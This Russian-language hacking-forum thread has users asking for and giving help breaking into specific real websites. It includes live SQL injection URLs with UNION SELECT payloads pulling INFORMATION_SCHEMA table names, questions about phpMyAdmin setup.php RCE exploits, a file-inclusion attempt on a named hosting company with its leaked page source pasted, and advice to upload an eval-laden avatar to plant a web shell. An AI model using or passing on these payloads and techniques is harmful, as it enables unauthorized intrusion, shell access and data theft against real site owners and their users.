Довел 1 сайт до: Суть в том, что есть некая страница page.html?...&c= ... — некоторые параметры, не в них суть. &c= — можно указать что угодно. Если указать какой-нибудь некорректный знак выдает эту ошибку. Что можно с этим сделать? Также есть страницы newsN.html (где N — номер новости). Видимо расширение сделано с помощью .htaccess, т.к. можно ввести даже news-1.html ; news9999999999.html — и страница откроется (новость пустая, но открывается же). Можно с этим что-то сделать?
Нашел на одном сайте PMA v2.11.9 со скриптом установки setup.php. PHP стоит 5.2.10. Попробывал все доступные экспы по RCE - и через ftp и через сессии от Snipper`а, а результата нет. При использовании экспа для ftp выводил phpinfo(); exit; конструкции. Должно было вывалится окно phpinfo, но на выводе все равно только стандартное окно установшика. Прошу помощи у знатоков. В чем может быть причина?
news2.html - заходит news1+1.html - выдает первую страницу? news3'.html - открывает третью, вроде не экранируется. Есть возможность блинда?
http://yesphun[antigoogle].com/index.php?p=1 Вроде нашел инклуд. Как обрезать расширение? %00 не пашет!
К примеру малоизвестный способ чтения файлов: PHP: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>YESPHUN.COM - Sabah's 1st Low-Cost Malaysia Web Hosting Services</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="description" content="YESPHUN.COM is Sabah low-cost web hosting provider since 2008. We do provide Domain Registration, Shared Hosting Plan, Reseller Hosting Plan, Dedicated Servers, Web Design, E-Commerce Solutions, Blog Solutions, Forum Solutions & etc."> <meta name="keywords" content="Low Cost, Web Design, yesphun, sabah website design, malaysia website design, graphic design, script writing, script installation, web hosting, sandakan web hosting, sabah web hosting, malaysia web hosting, kota kinabalu, sandakan, e-commerce, forum, blog, affordable"> <link rel="stylesheet" href="css/style.css" type="text/css" /> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" /> <link rel="icon" href="favicon.ico" type="image/x-icon" /> <!-- Powered by YESPHUN System v6.0 --> </head> <script type="text/javascript" src="java/jquery.js"></script> <script type="text/javascript" src="java/tween.js"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-12321486-1"); pageTracker._trackPageview(); } catch(err) {}</script> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_jumpMenu(targ,selObj,restore){ eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); if (restore) selObj.selectedIndex=0; } //--> </script> <div id="fb-root"></div> <script> window.fbAsyncInit = function() { FB.init({appId: 'your app id', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); </script> <style> body{ padding:0; margin:0; font-family:Arial; font-size:12px; color:#000000; background-color:#8c0007; } a:link, a:visited { color:#000000; text-decoration:underline; } a:active, a:hover { color:#990000; text-decoration:none; } </style> <style type="text/css"> img{border:0;} </style> <body> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <!--DWLayoutTable--> <tr> <td width="26" height="80" valign="top" bgcolor="#CF141D"><!--DWLayoutEmptyCell--> </td> <td width="705" align="left" bgcolor="#CF141D"><a href="index.php"><img src="img/yesphuncom-white-300-80.jpg" border="0"></a></td> <td width="529" align="right" valign="top" bgcolor="#CF141D"><!--DWLayoutEmptyCell--> </td> </tr> </table> <table width="1249" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF"> <!--DWLayoutTable--> <tr> <td height="40" colspan="2" class="language"> <div class="lang" align="center">YESPHUN IT CENTRE (001975944-K) </div> </td> <td height="40" width="3" rowspan="2" valign="top"><!--DWLayoutEmptyCell--> </td> <td height="40" colspan="5" rowspan="2" valign="top"><ul id="menu"> <li><a href="index.php">Home</a></li> <li><a href="?p=hosting/hosting&host=hosting/select">Web Hosting</a></li> <li><a href="?p=domain/domain&domain=domain/pricing">Domain Name</a></li> <li><a href="?p=services/services&ser=services/ser-select">Services</a></li> <li><a href="?p=promo/promotion">Promotions</a></li> <li><a href="http://billing.yesphun.com/cart.php" target="_blank">Sign up</a></li> <li><a href="?p=online/paymentinfo">Payment Info</a></li> <li><a href="?p=faq/faq">FAQs</a></li> <li><a href="?p=contact&cu=eform">Contact Us</a></li> </ul></td> </tr> <tr> <td width="4" height="18"> </td> <td width="289"> </td> </tr> <tr> <td height="516"></td> <td colspan="4" valign="top"><?php require ('functions.php'); require (''.$body.'.php'); ?></td> <td width="4"> </td> <td colspan="2" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC"> <!--DWLayoutTable--> <tr> <td width="250" height="203" valign="top"><div align="center"> <p><div class="outer"> <div class="menu"> <ul> <li><a href="http://billing.yesphun.com/clientarea.php" target="_blank">Manage my billing</a></li> <li><a href="?p=updatepayment">Update Payment</a></li> <li><a href="http://billing.yesphun.com/submitticket.php" target="_blank">Submit a ticket</a></li> <li><a href="http://billing.yesphun.com/supporttickets.php" target="_blank">View/Reply ticket</a></li> <li><a href="?p=announcements/news&news=announcements/update">Event & News</a></li> <li><a href="?p=domain/domainportal">Domain Login</a></li> </ul> </div> </div></p> </div></td> </tr> <tr> <td height="75"><table width="100%" border="0" cellpadding="0" cellspacing="0" background="img/follow.gif" bgcolor="#CCCCCC"> <tr> <td width="9" height="75"> </td> <td width="232"><div class="update">Follow us on.. <hr></div> <a href="http://www.facebook.com/yesphuncom" target="_blank"><img src="img/facebook.gif" width="24" height="24" border="0"></a> <a href="#" target="_blank"><img src="img/twitter.png" width="25" height="25" border="0"></a> <a href="?p=livechat"><img style="border-style: none;" src="http://messenger.services.live.com/users/[email protected]/presenceimage?mkt=en-US" width="16" height="16" /></a> </td> <td width="9"> </td> </tr> </table></td> </tr> <tr> <td height="11"></td> </tr> <tr> <td height="209" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0"> <!--DWLayoutTable--> <tr> <td width="10" height="209" valign="top" bgcolor="#EBEBEB"><!--DWLayoutEmptyCell--> </td> <td width="229" valign="top" bgcolor="#EBEBEB"><br /><div class="update">About us.. <hr> </div> <div align="justify"><strong>YESPHUN.COM</strong> is one of the malaysia low-cost hosting provider since 2008. We do provide Domain Registration, Shared Hosting Plan, Reseller Hosting Plan, and Dedicated Servers. Besides, we also provided web design, E-Commerce solutions, blog solutions, forum solutions & etc. Our promises is to offer you an affordable hosting and high quality of services. Everyone can get a host. </div></td> <td width="11" valign="top" bgcolor="#EBEBEB"><!--DWLayoutEmptyCell--> </td> </tr> <!--DWLayoutTable--> </table></td> </tr> <tr> <td height="15"> </td> </tr> </table></td> </tr> <tr> <td height="32" bgcolor="#F0F0F0"></td> <td colspan="3" bgcolor="#F0F0F0"><div class="footer">Copyright © 2010 YESPHUN IT CENTRE (001975944-K). All Right Reserved.<br> Best view at 1280 x 800 resolution. Recommended browser <a href="http://www.mozilla.com/en-US/" target="_blank">Mozilla Firefox 3.6++</a> or <a href="http://www.google.com/chrome/" target="_blank">Google Chrome 5.0++</a></div></td> <td colspan="3" bgcolor="#F0F0F0"><div align="right" class="footer"><a href="?p=tnc">Terms & Conditions</a> | <a href="?p=aup">Acceptable Use Policy</a> | <a href="?p=faq/faq">FAQs</a> | <a href="?p=contact&cu=eform">Contact Us </a></div></td> <td width="4" bgcolor="#F0F0F0"> </td> </tr> <tr> <td height="0"></td> <td></td> <td></td> <td width="416"></td> <td width="283"></td> <td></td> <td width="246"></td> <td></td> </tr> </table> <p></p> </body> </html> Так же, в целях ознакомления советую прочитать эту статью: https://forum.antichat.ru/thread98525.html
Нашел вот это. http://uk.generic4all.com/upload_files/product_images/product_image_173_small.png/x.php Каким образом здесь залить шелл, или это не возможно?
Регайся в ресурсе и загрузи в профиле eval аватарку и так же вызови файл http://uk.generic4all.com/upload_files/product_images/myevilavatar.png/.php прочитай еще это http://habrahabr.ru/blogs/sysadm/100961/
Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю. http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null,null,null+--+
HTML: http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES
>До меня быстрей доходит на примерах. И мне помогите со скульей: PHP: http://cdo.kz/ru/default/index/search?q={SQL-CODE}
